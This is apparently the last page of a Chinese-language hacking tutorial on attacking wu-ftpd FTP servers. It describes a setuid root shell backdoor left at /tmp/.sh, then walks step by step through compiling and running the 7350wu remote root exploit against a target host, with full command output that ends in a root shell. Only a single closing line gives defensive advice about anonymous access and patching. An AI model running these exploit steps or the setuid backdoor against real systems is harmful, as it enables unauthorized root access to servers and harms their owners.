#
恭喜您...到此您就成功的拿到 root 权限了....
3. 由於 wu-ftpd 执行时的 euid 是 root ,所以我们透过这个 hole 来执行执行外部的命令.... 当编译完的 bug 一但被执行,便会帮您将 /bin/sh 这个 shell 复制一份到 /tmp/.sh 下,并且 会将 /tmp/.sh setuid ,一但成功後只要任何使用者执行 /tmp/.sh 这个 setuid shell 就会拥 有 root 的 euid ....
二、比较新点的7350wu和wugod类似,源代码可以到hack.co.za找到: 1.先在攻击者系统上编译7350wu [root@ha vitter /tmp]# tar -zxvf 7350wu-v5.tar.gz //首先解包 7350wu/ 7350wu/7350wu.c 7350wu/common.c 7350wu/network.c 7350wu/common.h 7350wu/network.h 7350wu/Makefile [root@ha vitter /tmp]# cd 7350wu //进入解压缩后的目录 [root@ha vitter 7350wu]# make //编译 cc -Wall -g -c -o common.o common.c cc -Wall -g -c -o network.o network.c cc -Wall -g -o 7350wu 7350wu.c common.o network.o
2.进行远程攻击 [root@ha vitter 7350wu]# ./7350wu -h xxx.xxx.xxx.xxx //执行 7350wu - wuftpd <= 2.6.0 x86/linux remote root (mass enabled) by team teso
phase 1 - login... login succeeded phase 2 - testing for vulnerability... vulnerable, continuing phase 3 - finding buffer distance on stack... ########## found: 1100 (0x0000044c) phase 4 - finding source buffer address... ############ found: 0xbfffdd3d phase 5 - find destination buffer address... #### found: 0xbfffb0e0 phase 6 - calculating return address retaddr = 0xbfffdf25 phase 7 - getting return address location found 0xbfffd0e4 phase 8 - exploitation... using return address location: 0xbfffd0e4 len = 510 74514211817513660947028668510222160622076404425037294968863449191234404352 3616611 1934652240 uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp) //得到root shell
FTP对策:根据自己实际需要作出是否允许匿名访问。打上最新的厂家提供的补丁。
共4页: 上一页 [1] [2] [3] 4 下一页
|